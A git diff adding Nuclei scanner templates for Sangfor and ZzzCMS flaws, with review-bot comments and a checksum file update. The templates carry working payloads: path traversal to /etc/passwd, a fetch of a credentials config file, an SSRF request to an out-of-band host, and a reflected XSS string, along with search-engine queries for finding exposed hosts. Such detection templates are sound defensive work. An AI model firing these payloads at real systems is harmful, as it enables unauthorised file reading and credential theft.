+ fofa-query: app="SANGFOR-应用交付报表系统"
+ verified: true
+ tags: lfi,sangfor
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/report/download.php?pdf=../../../../../etc/passwd'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+
+ - type: word
+ part: header
+ words:
+ - application/force-download
+ - 'filename="passwd"'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/other/sangfor-sysuser-conf.yaml b/http/vulnerabilities/other/sangfor-sysuser-conf.yaml
new file mode 100644
index 0000000000..9991923c15
--- /dev/null
+++ b/http/vulnerabilities/other/sangfor-sysuser-conf.yaml
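Review bot: The `name` field in sangfor-download-lfi.yaml misspells "Arbitrary" as `Arbitary`, so the template is missed by anyone searching results or the template index by name; it should read `name: Sangfor Application download.php - Arbitrary File Read`. The description could also name the `pdf` parameter, which is where the request places the traversal sequence, for example `The pdf parameter of report/download.php is used as a file path without restriction.`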
@@ -0,0 +1,34 @@
+id: sangfor-sysuser-conf
+
+info:
+ name: Sangfor Application sys_user.conf Account Password Leakage
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password
+ reference:
+ - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20sys_user.conf%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
+ - https://github.com/achuna33/MYExploit/blob/master/src/main/java/com/achuna33/Controllers/SangForController.java
+ metadata:
+ max-request: 1
+ fofa-query: app="SANGFOR-应用交付管理系统"
+ tags: lfi,sangfor,exposure
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tmp/updateme/sinfor/ad/sys/sys_user.conf"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "true"
+ - "admin"
+ - "密码"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml
new file mode 100644
index 0000000000..dcb8294680
--- /dev/null
+++ b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml
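Review bot: The body matcher in sangfor-sysuser-conf.yaml relies on `true`, `admin` and `密码`, three words that also occur on an ordinary Chinese-language login or error page, and the template has no header check and no `verified` flag. A host that answers every path with status 200 and an HTML page can therefore be reported as a high-severity credential leak. Either match a string that occurs only in `sys_user.conf`, or add a matcher that rejects HTML responses; the fence shows the second option and assumes the file is served as plain text, which should be confirmed against a real response. The `lfi` tag also does not fit, since the request is a direct fetch of a fixed path.

```yaml
  matchers-condition: and
  matchers:
    # … unchanged: word matcher on "true", "admin", "密码" …

    # reject catch-all HTML pages that happen to contain the same words
    - type: word
      part: body
      words:
        - "<html"
        - "<!DOCTYPE"
      condition: or
      case-insensitive: true
      negative: true

    # … unchanged: status matcher …
```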
@@ -0,0 +1,40 @@
+id: zzzcms-info-disclosure
+
+info:
+ name: Zzzcms 1.75 - Information Disclosure
+ author: ritikchaddha
+ severity: low
+ description: |
+ There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore
+ reference:
+ - https://xz.aliyun.com/t/7414
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: html:"ZzzCMS"
+ fofa-query: title="ZzzCMS"
+ tags: zzzcms,info,disclosure
+
+http:
+ - raw:
+ - |
+ GET /plugins/webuploader/js/webconfig.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'var adminpath'
+ - 'var imageMaxSize='
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
new file mode 100644
index 0000000000..2f09159dc7
--- /dev/null
+++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
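Review bot: The `description` in zzzcms-info-disclosure.yaml reads as an informal translation ("a rather strange file", "No need to blast admin and add 3 digits anymore") and leaves the impact for a defender unclear. Text such as `plugins/webuploader/js/webconfig.php echoes values taken from zzz_config.php, including the name of the admin path, in response to a plain GET request.` says the same thing and matches the `var adminpath` matcher. The product is also written `Zzzcms` in this template's `name` and `ZzzCMS` in zzzcms-ssrf.yaml; using one spelling keeps name searches consistent.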
@@ -0,0 +1,44 @@
+id: zzzcms-ssrf
+
+info:
+ name: ZzzCMS 1.75 - Server-Side Request Forgery
+ author: ritikchaddha
+ severity: high
+ reference:
+ - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: html:"ZzzCMS"
+ fofa-query: title="ZzzCMS"
+ tags: zzzcms,ssrf,oast
+
+variables:
+ filename: "{{to_lower(rand_text_alpha(4))}}"
+
+http:
+ - raw:
+ - |
+ POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ source[0]=http://{{interactsh-url}}/{{filename}}.txt
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: body
+ words:
+ - '{"state":'
+ - 'list":'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml
new file mode 100644
index 0000000000..d12dabddfb
--- /dev/null
+++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml
@@ -0,0 +1,38 @@
+id: zzzcms-xss
+
+info:
+ name: Zzzcms 1.75 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ reference:
+ - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: html:"ZzzCMS"
+ fofa-query: title="ZzzCMS"
+ tags: zzzcms,xss
+
+http:
+ - raw:
+ - |
+ GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'onmouseover=alert(/d0cument.domain/) y=&act'
+ - 'document.write("'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/templates-checksum.txt b/templates-checksum.txt
index ed898d18b1..727ad9b704 100644
--- a/templates-checksum.txt
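Review bot: In zzzcms-xss.yaml the request sends `alert(/document.domain/)`, but the first body matcher expects `alert(/d0cument.domain/)`, with a zero in place of the `o`, and nothing in the file explains the difference. If the application rewrites the word before reflecting it, which `verified: true` suggests, state that in a comment above the matcher, for example `# the application reflects "document" as "d0cument"`, so that nobody later "corrects" the string. If it does not, the matcher is a typo and the template can never report a finding. Either way the matcher should be checked against a captured response.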
+++ b/templates-checksum.txt @@ -8,13 +8,13 @@ TEMPLATES-STATS.json:ea5d804cf72b5c14a93f78cdf90cf17abc32b1cb TEMPLATES-STATS.md:c820a18f1939ff427af10e4af970c402c296455a TOP-10.md:6fe06f1553578f1529be11eabd647cae757d6845 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:ac52aa87c237f61a666ac4d63388666a12905bc4 -cves.json-checksum.txt:c0b52889cdfd6f7577621fa51d5f2c5390387fb9 +cves.json:15592696933c38be6c207f2ecba944229dd21b16 +cves.json-checksum.txt:da8d536595f225133b92d3e01f6ee77b08c1b250 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c dns/dmarc-detect.yaml:d6d23a8837c5ec3809ffa2d407a72fdc7a071671 -dns/dns-saas-service-detection.yaml:07487ee1995207541f4fdbc8a226f7f71242dccb +dns/dns-saas-service-detection.yaml:b8e5a37cc3e5fcdeb3ec3a742b8bc81babf5c302 dns/dns-waf-detect.yaml:f4d80afe7d48cee91123294482cd63cadeaa943d dns/dnssec-detection.yaml:6dd2e7d114f3be862e2f1e87f5d2d2c4de1bf08a dns/ec2-detection.yaml:01823f3399c471516137b067f37f5c6661ae3099 
@@ -198,6 +198,117 @@ file/logs/python-app-sql-exceptions.yaml:7dc14b83b6bf6cfa63af6a1ea1739a02d9b8394 file/logs/ruby-on-rails-framework-exceptions.yaml:4cacd8d7144f8353b5927cac2d008c1d08bb3a50 file/logs/spring-framework-exceptions.yaml:59912aa3db6ff6d29783c9b4fd84a6dc4d8369f3 file/logs/suspicious-sql-error-messages.yaml:2e4c653f2d2012480e5fcd8f964c114e5a26e5a9 +file/malware/aar-malware.yaml:d02484c0b5bdc45733e8b2b19aeabf9d657c302a +file/malware/adzok-malware.yaml:ca6ec1ec509d1d3c81011fbd3b630bbc7880ae55 +file/malware/alfa-malware.yaml:8cb0da69ead8bd22e571734bc151c457f9f872fa +file/malware/alienspy-malware.yaml:58d0fccdc36f1d4134a3dff08444b74cfcc0b59a +file/malware/alina-malware.yaml:52d6d65a8d1a1cf27196dfbc549dfd7f4fa55088 +file/malware/alpha-malware.yaml:deaa68b7bf389e5022974def29e2ea1b006b9d80 +file/malware/andromeda-malware.yaml:b29e1a1751fa9ce222432207b77bc653d5286dde +file/malware/ap0calypse-malware.yaml:303b2c9fd6bae874c938d9d82527030bf249b111 +file/malware/arcom-malware.yaml:dc21540baf89192cbd26a45bef22c2fe240f4c4e +file/malware/arkei-malware.yaml:0efaa17826e99b688392cb21ceb65a9a3b84cda7 +file/malware/backoff-malware.yaml:97ce2ec738d3f5367dd76f66ac70af985d8e87fe +file/malware/bandook-malware.yaml:f8fcacb4072655713a29870400a1d3f3151903f5 +file/malware/blacknix-malware.yaml:dae2774112cbcb5185603cf6c074ffdcc48c7b43 +file/malware/blackworm-malware.yaml:a0d97ac2b0cde1837623b87411062008f4877299 +file/malware/bluebanana-malware.yaml:470f563a54ad024e47854d3e84a996077dfc386b +file/malware/bozok-malware.yaml:89cfa4b2cea3806302111197f5daa3bf8d97101f +file/malware/bublik-malware.yaml:b66d16da3c8f819d2b6f91060a4b6996345554d1 +file/malware/cap-hookexkeylogger-malware.yaml:2a355e5571b866db18ada408054e8d0208f04887 +file/malware/cerberus-malware.yaml:25a25bbad74d014c6a917dee037b4302cba3dae1 +file/malware/clientmesh-malware.yaml:ba9152040a38449e2aa1dd5f26ac2c177f983e50 +file/malware/crimson-malware.yaml:bddbde813ac3d2f859affce571a6f9383e886ea1 
+file/malware/cryptxxx-dropper-malware.yaml:e974652e29d8fcff19cfb18ba41440103fee8edd +file/malware/cryptxxx-malware.yaml:54778ab5c5f377c734f4382038003a65755063f4 +file/malware/cxpid-malware.yaml:6e98a2f82eb04aca3bf1216fedda822f4d56aba3 +file/malware/cythosia-malware.yaml:a9f4ff854507f36ea0cb853c7db1696ef926c16d +file/malware/darkrat-malware.yaml:b3dfa3e687050f3800e37bdcf053b64090f57dac +file/malware/ddostf-malware.yaml:72736a5e925f48613fb7be991b0d0e78cc30d8f0 +file/malware/derkziel-malware.yaml:14bbea26ab6cb272abbc6e57028c34b1b5fffc59 +file/malware/dexter-malware.yaml:21e72e7de717000f132174c4c3bd21d36f15c1ff +file/malware/diamondfox-malware.yaml:86c81b433f858b3395fe2187d93a688e12c7bb22 +file/malware/dmalocker-malware.yaml:675ef7c0e17e4c1e605bc0e306418b03e69a5e6d +file/malware/doublepulsar-malware.yaml:6bce78fb4d9f9a8f154c1bd67b86acac40d00374 +file/malware/eicar-malware.yaml:9fa490ad507ca2e008360f323518aa8c8a697632 +file/malware/erebus-malware.yaml:838f69db4458e97ec110b28bf1fedc48264470a4 +file/malware/ezcob-malware.yaml:caba2c2501d8bb999493ace4b62299b29e2edd40 +file/malware/fudcrypt-malware.yaml:606f00c1c3d53704b9bb22d5cdd1d87759c6c77b +file/malware/gafgyt-bash-malware.yaml:173d7cf67c3bb313c675c78f244ead4ea18819a3 +file/malware/gafgyt-generic-malware.yaml:6d93186cda54db0a1710de21831ac71fd5c3c0f7 +file/malware/gafgyt-hihi-malware.yaml:e0bdb54bc7784796b68175ff44e4ec662fde5790 +file/malware/gafgyt-hoho-malware.yaml:ae7dc3a2ef3a921f0df168f98d3174bb377b1507 +file/malware/gafgyt-jackmy-malware.yaml:81e7ece5aa3224af625e558851204614429d634f +file/malware/gafgyt-oh-malware.yaml:93ad09ab5a64831619780c326a8722ab22c8c812 +file/malware/genome-malware.yaml:a7b584dfb190c237d0dd386a72dc42ca1df817e5 +file/malware/glass-malware.yaml:307fb0eeee3f193d850b80f9a2cdd185d8c2d462 +file/malware/glasses-malware.yaml:26c99bfd1f68643de6fffffd1e4ee8fd33b25334 +file/malware/gozi-malware.yaml:651fe3c2635363da20645f0554580aa308519db0 
+file/malware/gpgqwerty-malware.yaml:f5fe50a60148ce35aaa9640a8e89d8273bdefe4b +file/malware/greame-malware.yaml:1a0ffb8c7a6e26c3f309d30466543fdc54e01649 +file/malware/grozlex-malware.yaml:49225c117d561fa7e43f37e4477d6d52ff17c983 +file/malware/hawkeye-malware.yaml:8b229438d26e450a318d52240fda05bf7caa4f12 +file/malware/imminent-malware.yaml:c92c332b6ba8e746068095771a4eeee4b84dee27 +file/malware/infinity-malware.yaml:d04c82aa2d333c15b08b3abffe8192a3e6bfbc1a +file/malware/insta11-malware.yaml:1270e9e29633db417e00ef5a9839a924c6bf0c3a +file/malware/intel-virtualization-malware.yaml:9215be19b1724696481fbd4534d903362547fa4f +file/malware/iotreaper-malware.yaml:ba9d17fc203a5ba6e2c273a3a15226a82614d902 +file/malware/linux-aesddos-malware.yaml:beb18c783a37d793207506326e679a09f6f08245 +file/malware/linux-billgates-malware.yaml:5e6990833085af09972c2c7e63dc0c69eb8f7a3b +file/malware/linux-elknot-malware.yaml:0f301a5c7a1649d92b3723f8596c254a29f2740e +file/malware/linux-mrblack-malware.yaml:c97e96acd11fa56c9f7fcc983ef0a830f6bce5d5 +file/malware/linux-tsunami-malware.yaml:725ff72dbe45be12f34663b66dbfdfb02edb9882 +file/malware/locky-malware.yaml:87753bb0e54b23b39c98cd8e1abfeb2701e15960 +file/malware/lostdoor-malware.yaml:57426eaf178c792223424ccc453b47a835295530 +file/malware/luminositylink-malware.yaml:061340d0aae55fda08bfdd1991e725d40ec611aa +file/malware/luxnet-malware.yaml:d954dfa7260c310dd5692adf7761dbb0585dcd89 +file/malware/macgyver-installer-malware.yaml:40fd5a41d1bfc4322e742fca86b41d75ede9a25b +file/malware/macgyver-malware.yaml:17d1497a42e425d96c2194ecd5b3e73ab43a04d2 +file/malware/madness-malware.yaml:844be25dbdca4a5fe759e9f423e886de0642bbdd +file/malware/miner--malware.yaml:3aafffaaf38c9bf153017e14d16a22ff914b1ac4 +file/malware/miniasp3-malware.yaml:1eb66ccf6661ee7a0947e7ff0094ead8a8ab6123 +file/malware/naikon-malware.yaml:97a1d9720cd78f4c6a18b7e030bef2ba3045dfca +file/malware/naspyupdate-malware.yaml:8831d92d923bc433add0a7960659204482161e8d 
+file/malware/notepad-malware.yaml:044bcb34935c966a6022da346f1c15773872ed73 +file/malware/olyx-malware.yaml:c5e5dc3708b09acfe8c307745a887920469aca25 +file/malware/osx-leverage-malware.yaml:46a803f0a5861789bfdd2e83ceb86f94fa80afd0 +file/malware/paradox-malware.yaml:dd7bdf7c0f70de79f683f08dd6619c2d6244ad46 +file/malware/plasma-malware.yaml:d7da17c7f6b10c3d963f58301b1c33d76e703ac2 +file/malware/poetrat-malware.yaml:7641ae53f0beb1d248e3215bb9edf0699298f344 +file/malware/pony-malware.yaml:84a29caf8c967d7a85f1ec3f9310126f4b3b6831 +file/malware/pubsab-malware.yaml:ee11be2ea23f1906682915b66c4581c0012d689d +file/malware/punisher-malware.yaml:0cd260b236d782eaee191a02bf9b7f1a010f543d +file/malware/pypi-malware.yaml:671af8b396e9c8469d87758ffdd10aa682ede40d +file/malware/pythorat-malware.yaml:0103fa4abb06a5b8b367670a083be084dea90048 +file/malware/qrat-malware.yaml:19f53a81c34327e21b3ed582a5cb01451c157b83 +file/malware/satana-dropper-malware.yaml:e63ab254aa3f1855b6c26967b594f9d8cf3a82d8 +file/malware/satana-malware.yaml:8e8da91b2c5c4fecdbce8df7bc95f0c76462e06f +file/malware/shimrat-malware.yaml:c5799bcdcecef37d10ea9e741bf81516c2d42d21 +file/malware/shimratreporter-malware.yaml:6e638d6a948fd3c7de3dcfb3445b948fb0e866c7 +file/malware/sigma-malware.yaml:c5c954713debaa83c0db44d08295bc57e411a096 +file/malware/smallnet-malware.yaml:e251ca064cea0b844a5b6f35f2494ce052d008f9 +file/malware/snake-malware.yaml:694580d182e2ca4a9d54d5f941599b057c4b34ce +file/malware/sub7nation-malware.yaml:d71ddfd6d8942907cb8fd3c9863d01a588f8043d +file/malware/t5000-malware.yaml:c0e654d311cc90d07a5c0108d3a864b11529a982 +file/malware/tedroo-malware.yaml:02923f9328241d6f41b1cf525f03ab7589dad7fd +file/malware/terminator-malware.yaml:d0f1608f784ca8fd02e2b8ec848d0234211cbb7e +file/malware/teslacrypt-malware.yaml:5e562bc0925622c8f36e2b9b11e3bd2884af1cd8 +file/malware/tox-malware.yaml:91590ae502a4dd2b1013a5a0ce325f584550f3d3 +file/malware/treasurehunt-malware.yaml:6333ad52929847e2aa0afaf8a1310519b532937a 
+file/malware/trickbot-malware.yaml:4062f86b7c518344dea7f66e1bb852807503262c +file/malware/trumpbot-malware.yaml:a491065b415c12ecf7985ebb7b7537a2c5c94f31 +file/malware/universal-1337-malware.yaml:b7490cf01942ec8b91ce0918890b2345c9c2ae38 +file/malware/unrecom-malware.yaml:a9b4d2a500c926f822e48db075735b0ac5db3b0a +file/malware/urausy-malware.yaml:a56e2743aec670bd172c946a18908703ba2dec7f +file/malware/vertex-malware.yaml:ac3afeb14a1dba663914f52a6b79e8f1d5d620be +file/malware/virusrat-malware.yaml:8c86975e41259776e49fae31a196ce216080fb93 +file/malware/wabot-malware.yaml:f99093842e2acf3cd1b772971abddf4ec31f3d0e +file/malware/warp-malware.yaml:aee46d47a73601fbe245a690b8095a9b8ea60ac9 +file/malware/xhide-malware.yaml:acdf0229aece896e3c4416c6524ca6b93949fcd9 +file/malware/xor-ddos-malware.yaml:dc69bca629a51dd6e23216043e7841dec6ce08fa +file/malware/yayih-malware.yaml:805f7343ac975a91a1572ca4629e4fa9638070e0 +file/malware/zeghost-malware.yaml:19400d9592f9bd59fbc8667f062570c861487c3d +file/malware/zoxpng-malware.yaml:833924a57059d6b7ffa5fc354816ea2f914e0b97 file/nodejs/admzip-path-overwrite.yaml:3f7f79845877828f87e72b81326e6a90049bd8ea file/nodejs/express-lfr.yaml:cec2babe3b1d46416ec358ed00a5cea450531c13 file/nodejs/generic-path-traversal.yaml:49895d260bb6da86bd36dde6553265963cc62db0 
@@ -240,12 +351,12 @@ helpers/wordpress/plugins/ad-inserter.txt:38bc2a6cfb847a70c262d12fd6603606363254 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df -helpers/wordpress/plugins/advanced-custom-fields.txt:ffc1feb775249e46c0a2c4c8c83174ca4d2a125e +helpers/wordpress/plugins/advanced-custom-fields.txt:08601881a118badedde20b726e52078f3318fba1 helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:82ad50ca4cbd63a3f83ddbd28315b55b52f600fb +helpers/wordpress/plugins/all-in-one-seo-pack.txt:68a50e98458a9c28886ed15ffb2cc666b2d3d49b helpers/wordpress/plugins/all-in-one-wp-migration.txt:9c43220fa09b15d375ba7679041d0bd2e22746b8 -helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:49911098f5af8acdff20786f92ff5e717cf35906 +helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:ba99f9ee25995f984c5e6c79172400eaf52edbaa helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 helpers/wordpress/plugins/antispam-bee.txt:b91ff026739750b181b34969295fb93cf8fdc898 helpers/wordpress/plugins/astra-sites.txt:3a8e01bbd716628be7b89f1ec085442592846654 
@@ -269,7 +380,7 @@ helpers/wordpress/plugins/code-snippets.txt:fbc954f986ea78ee55f14e1ee288f60983e4 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:6edccbf589807e4171353b69b32d148fb22948d3 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/contact-form-7.txt:aa016b2fe9e1d5ec44a206b16f237f748a306395 +helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329 helpers/wordpress/plugins/contact-form-cfdb7.txt:456a1b2970af52d0b32db52b0683f87df6c6e06c helpers/wordpress/plugins/cookie-law-info.txt:8b06ddb10d32fd00c6f396f4696592af976b2118 helpers/wordpress/plugins/cookie-notice.txt:8599c5904510bf3031da09a62f0802bc300e964e @@ -292,7 +403,7 @@ helpers/wordpress/plugins/elementor.txt:664c4c547c02ee1e3a770bdf2fc99f33b46ffa42 helpers/wordpress/plugins/elementskit-lite.txt:35fd2c7ac7c4486ea481738632d2b2188a5e0917 helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:d1c111ea61a3a6d959d6d130490baf4705c44dee +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:33b70bd6d25d500ed8be7286bcefff3df64d27b1 helpers/wordpress/plugins/ewww-image-optimizer.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b helpers/wordpress/plugins/facebook-for-woocommerce.txt:56f36dae4913c52f18de86fa71feb54d31fb1f77 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 
@@ -304,12 +415,12 @@ helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb82272 helpers/wordpress/plugins/formidable.txt:f96eaecad7005b860741ecc59d4835f7428015fd helpers/wordpress/plugins/forminator.txt:5a13f9241243c2d9d28367028c116b0cf92f566d helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe2e17de1bc9 -helpers/wordpress/plugins/gdpr-cookie-compliance.txt:0b029e20735269b8d97357faa7e020b378eb41c8 +helpers/wordpress/plugins/gdpr-cookie-compliance.txt:468c943991a0608d57031fc177f82d41b494e72a helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:072a88924070c3f9a7f0bcc0bd504dcee9db878b helpers/wordpress/plugins/google-analytics-for-wordpress.txt:0a156a8d62cb442177dbc6af4c27a04bd7d19a70 helpers/wordpress/plugins/google-listings-and-ads.txt:317ed41a757a4ad0ce808afd99dbc4ec974d9991 helpers/wordpress/plugins/google-site-kit.txt:2bdab5af2a03ca19e7d7e36e5d1120a08c5bfc5b -helpers/wordpress/plugins/google-sitemap-generator.txt:32cb3486704c3d1ac786316411e5d97ab281fea2 +helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61 helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 helpers/wordpress/plugins/gutenberg.txt:436e574867e719c08a75ff683536950ca3040098 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf 
@@ -317,7 +428,7 @@ helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b helpers/wordpress/plugins/header-footer-code-manager.txt:c2e02b33da3f80da726e9cf198552626bb5042e8 helpers/wordpress/plugins/header-footer-elementor.txt:a9510f9e42b212b735a604c279959b616f8ddd5a helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 -helpers/wordpress/plugins/health-check.txt:40e124dcbde01bd9224f2d58906f34c83d1441ae +helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 helpers/wordpress/plugins/host-webfonts-local.txt:01ac9a64a711d9d1b7130e24a92eb95b0850c705 helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c @@ -328,8 +439,8 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa86 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/jetpack-boost.txt:f7ca6a21d278eb5ce64611aadbdb77ef1511d3dd helpers/wordpress/plugins/jetpack.txt:afd55b1155942508618aaeac51195339624a510c -helpers/wordpress/plugins/kadence-blocks.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a -helpers/wordpress/plugins/kirki.txt:2cbc97154c127c59a298a4207a147a2fff01b48f +helpers/wordpress/plugins/kadence-blocks.txt:deccc3cf363403cddb880388388bf192fbcfd655 +helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa helpers/wordpress/plugins/leadin.txt:f8eabd3f57e988795ca00df88696aefb639b9afc helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:d4dbf56812ab4702a984154c87a3e904d467f063 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 
@@ -342,7 +453,7 @@ helpers/wordpress/plugins/mailchimp-for-wp.txt:2bf65a0d95209c8002516a0a1d50958c3 helpers/wordpress/plugins/mailpoet.txt:70513ebb6b872e4203eb826ee4aabf0e430266a8 helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 helpers/wordpress/plugins/mainwp-child.txt:980feb4697a9a59378889074eb2a9c667eb85231 -helpers/wordpress/plugins/malcare-security.txt:d4d296df9c7bfc07d0bc5adb18ee49bef62495cd +helpers/wordpress/plugins/malcare-security.txt:5d8ff3e1d64162e6d335ec7d6b824be075a058dd helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/meta-box.txt:57efd6c9af996d49184c10d2eb37abea3ad4614c 
@@ -356,18 +467,18 @@ helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd10 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 helpers/wordpress/plugins/optinmonster.txt:43d658fcb5e8bd6cac245dd878e485a7651c9a4f helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/password-protected.txt:bab6135b6f4ed36108f0a960f3b099b81315d000 +helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:08a174cc900680a65f258ba7bfefa6157041f4a4 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pixelyoursite.txt:c6043029d8fee3b06ca3583c71e935a8241c7323 +helpers/wordpress/plugins/pixelyoursite.txt:2ab2f5b3508905fb476f1227adb86c8b4de8ccf3 helpers/wordpress/plugins/polylang.txt:d8521792e123691f48a1df559885c477069c6c1d helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe helpers/wordpress/plugins/post-smtp.txt:a53d438c54d64bd5c96a8f6f3294569e50329234 helpers/wordpress/plugins/post-types-order.txt:ccc7f2bf6d0604d86f3d33a12b75411b311e9dfe helpers/wordpress/plugins/premium-addons-for-elementor.txt:06f1e9394396003ffa1e6b7ac8d848faba0ba8c3 -helpers/wordpress/plugins/pretty-link.txt:c02807771e1a750f51754b3494db53c68a5a7d94 +helpers/wordpress/plugins/pretty-link.txt:2760f23f36812b1f488df2ca1b312429d68b0f8e helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf 